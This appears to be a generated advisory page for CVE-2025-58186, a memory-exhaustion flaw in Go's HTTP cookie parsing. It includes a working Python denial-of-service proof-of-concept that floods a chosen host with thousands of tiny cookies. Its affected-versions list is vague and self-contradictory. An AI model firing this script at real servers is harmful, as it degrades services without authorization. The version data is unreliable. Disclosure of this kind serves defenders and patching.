Security Vulnerability Report
CVE-2025-58186 CVSS 5.3 MEDIUM

Published: 2025-10-29 23:16:20
Last Modified: 2026-04-15 00:35:42

Description

Although HTTP headers have a default size limit of 1MB, there is no limit on the number of cookies that can be parsed. By sending many very small cookies such as "a=;", an attacker can make an HTTP server allocate a large number of cookie structs, causing high memory consumption.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Go < 1.23.x (fixed version)
Go < 1.22.x (fixed version)
All HTTP services built with affected Go versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-58186 PoC - Go net/http Cookie Parsing Memory Exhaustion

This PoC demonstrates how an attacker can cause memory exhaustion by sending
HTTP requests with a large number of small cookies.
"""
import socket
import sys


def send_malicious_cookie_request(host, port, num_cookies):
    """
    Send an HTTP request with many small cookies to exhaust server memory.

    Args:
        host: Target server hostname
        port: Target server port
        num_cookies: Number of small cookies to send
    """
    # Generate many small cookies like "a=;"
    cookies = ";".join([f"a{i}=" for i in range(num_cookies)])

    # Construct HTTP request with malicious Cookie header
    request = (
        f"GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookies}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((host, port))
        sock.sendall(request.encode())

        # Receive response (may be incomplete or time out)
        response = b""
        while True:
            try:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
            except socket.timeout:
                break
        sock.close()
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False


def main():
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <host> <port> [num_cookies]")
        print(f"Example: {sys.argv[0]} example.com 8080 50000")
        sys.exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    num_cookies = int(sys.argv[3]) if len(sys.argv) > 3 else 50000

    print(f"[*] Sending request with {num_cookies} small cookies to {host}:{port}")
    print("[*] This may cause memory exhaustion on vulnerable Go HTTP servers")

    send_malicious_cookie_request(host, port, num_cookies)

    print("[+] Request sent. Monitor server memory usage.")


if __name__ == "__main__":
    main()
```

References

- https://go.dev/cl/709855
- https://go.dev/issue/75672
- https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI
- https://pkg.go.dev/vuln/GO-2025-4012
- http://www.openwall.com/lists/oss-security/2025/10/08/1

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58186",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T23:16:19.547",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Despite HTTP headers having a default limit of 1MB, the number of cookies that can be parsed does not have a limit. By sending a lot of very small cookies such as \"a=;\", an attacker can make an HTTP server allocate a large amount of structs, causing large memory consumption."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "references": [
      {"url": "https://go.dev/cl/709855", "source": "[email protected]"},
      {"url": "https://go.dev/issue/75672", "source": "[email protected]"},
      {"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI", "source": "[email protected]"},
      {"url": "https://pkg.go.dev/vuln/GO-2025-4012", "source": "[email protected]"},
      {"url": "http://www.openwall.com/lists/oss-security/2025/10/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}
```